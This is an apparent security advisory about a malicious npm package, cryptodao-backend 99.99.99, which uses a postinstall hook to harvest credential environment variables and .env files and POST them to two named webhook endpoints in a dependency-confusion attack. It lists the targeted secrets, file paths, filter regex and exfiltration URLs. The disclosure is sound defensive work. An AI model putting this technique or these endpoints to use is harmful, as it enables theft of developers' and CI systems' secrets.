cryptodao-backend @99.99.99

Summary

package.json declares postinstall: node recon.js , which auto-runs on npm install . recon.js (lines 30-46) scrapes a curated list of credential-bearing environment variables including AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, NPM_TOKEN, CI_REGISTRY_PASSWORD, GITLAB_ACCESS_TOKEN, SSH_PRIVATE_KEY, PRIVATE_KEY, MNEMONIC, and DB_PASSWORD. It additionally enumerates and reads.env files at multiple paths outside the package's own scope ( .env , ../.env , /app/.env , /home/gitlab-runner/.env , /root/.env ), filtering lines matching /KEY|SECRET|TOKEN|PASS|PRIVATE|MNEMONIC/i. The collected JSON payload is POSTed (recon.js:84-87, 99-106) over HTTPS with rejectUnauthorized:false to two attacker-controlled endpoints: https://webhook.site/d6d18927-e513-4df7-b019-58bfc64fe0dd and https://enqoojbegdvxj.x.pipedream.net/ . The package self-describes as the "CryptoDAO internal cryptodao-backend module" and is published at version 99.99.99 — the canonical dependency-confusion shape designed to outrank a private internal package of the same name during npm resolution. A source comment in recon.js explicitly labels itself a "Dependency Confusion Reconnaissance Payload."

Source: amazon-inspector (2dbe5f8614a264a8d3cdd2ecf8ecd2ad17292dbb5c5bcc25d0ae9d77eb8821df)